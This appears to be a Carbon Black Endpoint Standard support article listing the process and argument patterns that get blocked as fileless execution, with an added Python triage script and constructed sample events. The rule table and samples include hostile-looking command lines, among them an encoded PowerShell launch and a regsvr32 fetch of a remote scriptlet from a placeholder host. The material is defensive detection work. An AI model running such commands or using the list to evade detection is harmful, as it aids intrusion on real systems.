
Endpoint Standard: How to find events blocked by fileless execution without the ttp tag


Environment

  • Carbon Black Cloud Console: All Versions
  • Endpoint Standard Sensor: All Versions

Objective

Find the files that would be blocked by fileless execution without the ttp:FILELESS tag

Resolution

The following processes and command-line arguments will cause an event to be blocked as a fileless execution:

Process          Command-line arguments
cmd.exe          /k, /r, or /c
powershell.exe   " \"iex\" ", " iex ", Invoke-Expression, FromBase64String, DeflateStream, -NonI, -e, or -c
python.exe       decode or base64
ruby.exe         unpack(
perl.exe         decode_base64(
regsvr32.exe     sct, /u, or /i:http
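To check existing process events against the table above before the ttp:FILELESS tag is available, the following added example (not Carbon Black's own code, and not the sensor's matching logic) encodes the process/argument pairs listed in the article and runs them over a few constructed event records. The sensor's exact matching semantics are not stated on the page, so two assumptions are made and labelled: short switches such as /c and -e are compared as whole command-line tokens (so "-ExecutionPolicy" does not trip the "-e" rule), and every other pattern is a case-insensitive substring match. The " \"iex\" " entry is interpreted as the literal text iex wrapped in double quotes and spaces.

```python
from typing import Dict, List, Tuple

# Process/argument pairs from the article. Kind "token" means the pattern
# must appear as a whole whitespace-separated argument; "substring" means
# it may appear anywhere in the command line. Both comparisons are
# case-insensitive. (Assumption: the page does not state the sensor's
# exact matching rules.)
FILELESS_RULES: Dict[str, List[Tuple[str, str]]] = {
    "cmd.exe": [("/k", "token"), ("/r", "token"), ("/c", "token")],
    "powershell.exe": [
        (' "iex" ', "substring"),        # article writes this as " \"iex\" "
        (" iex ", "substring"),
        ("Invoke-Expression", "substring"),
        ("FromBase64String", "substring"),
        ("DeflateStream", "substring"),
        ("-NonI", "substring"),
        ("-e", "token"),
        ("-c", "token"),
    ],
    "python.exe": [("decode", "substring"), ("base64", "substring")],
    "ruby.exe": [("unpack(", "substring")],
    "perl.exe": [("decode_base64(", "substring")],
    "regsvr32.exe": [("sct", "substring"), ("/u", "token"), ("/i:http", "substring")],
}


def process_basename(path: str) -> str:
    """Event records usually carry a full image path; compare on the file name only."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def matching_patterns(process: str, cmdline: str) -> List[str]:
    """Return the article's patterns that the given process/command line hits, in table order."""
    rules = FILELESS_RULES.get(process_basename(process), [])
    lowered = cmdline.lower()
    tokens = [tok.lower() for tok in cmdline.split()]
    hits = []
    for pattern, kind in rules:
        if kind == "substring" and pattern.lower() in lowered:
            hits.append(pattern)
        elif kind == "token" and pattern.lower() in tokens:
            hits.append(pattern)
    return hits


def would_be_blocked(process: str, cmdline: str) -> bool:
    """True when the event would be blocked as a fileless execution under these rules."""
    return bool(matching_patterns(process, cmdline))


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Filter a list of {'process', 'cmdline'} records down to those that would be blocked."""
    results = []
    for event in events:
        hits = matching_patterns(event["process"], event["cmdline"])
        if hits:
            results.append((event["process"], event["cmdline"], hits))
    return results


# Constructed sample events (not real telemetry); "AAAA" stands in for an encoded command.
SAMPLE_EVENTS = [
    {"process": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -NonI -e AAAA"},
    {"process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File x.ps1"},
    {"process": r"C:\Python39\python.exe", "cmdline": "python.exe script.py --verbose"},
    {"process": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /i:http://example.invalid/test.sct"},
    {"process": r"C:\Ruby\bin\ruby.exe", "cmdline": "ruby.exe -e \"puts ['aGk='].pack('m').unpack('m')\""},
    {"process": r"C:\Windows\notepad.exe", "cmdline": "notepad.exe readme.txt"},
]

if __name__ == "__main__":
    for process, cmdline, hits in triage(SAMPLE_EVENTS):
        print(f"{process_basename(process):15} {hits}  <- {cmdline}")
```

Running the script prints the four sample events that hit the table (cmd.exe /c, powershell.exe with -NonI and -e, regsvr32.exe with sct and /i:http, ruby.exe with unpack(). The -ExecutionPolicy case is deliberately included to show why the short switches are compared as whole tokens rather than substrings; if the real sensor behaves differently, adjust the "token"/"substring" kinds in FILELESS_RULES to match what you observe in the console.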

Additional Notes

Future work may add more granular exclusions so that specific scripts that use these commands can be allowed to execute (tracked as CBC-383).

Article Information
Creation Date: 02-16-2021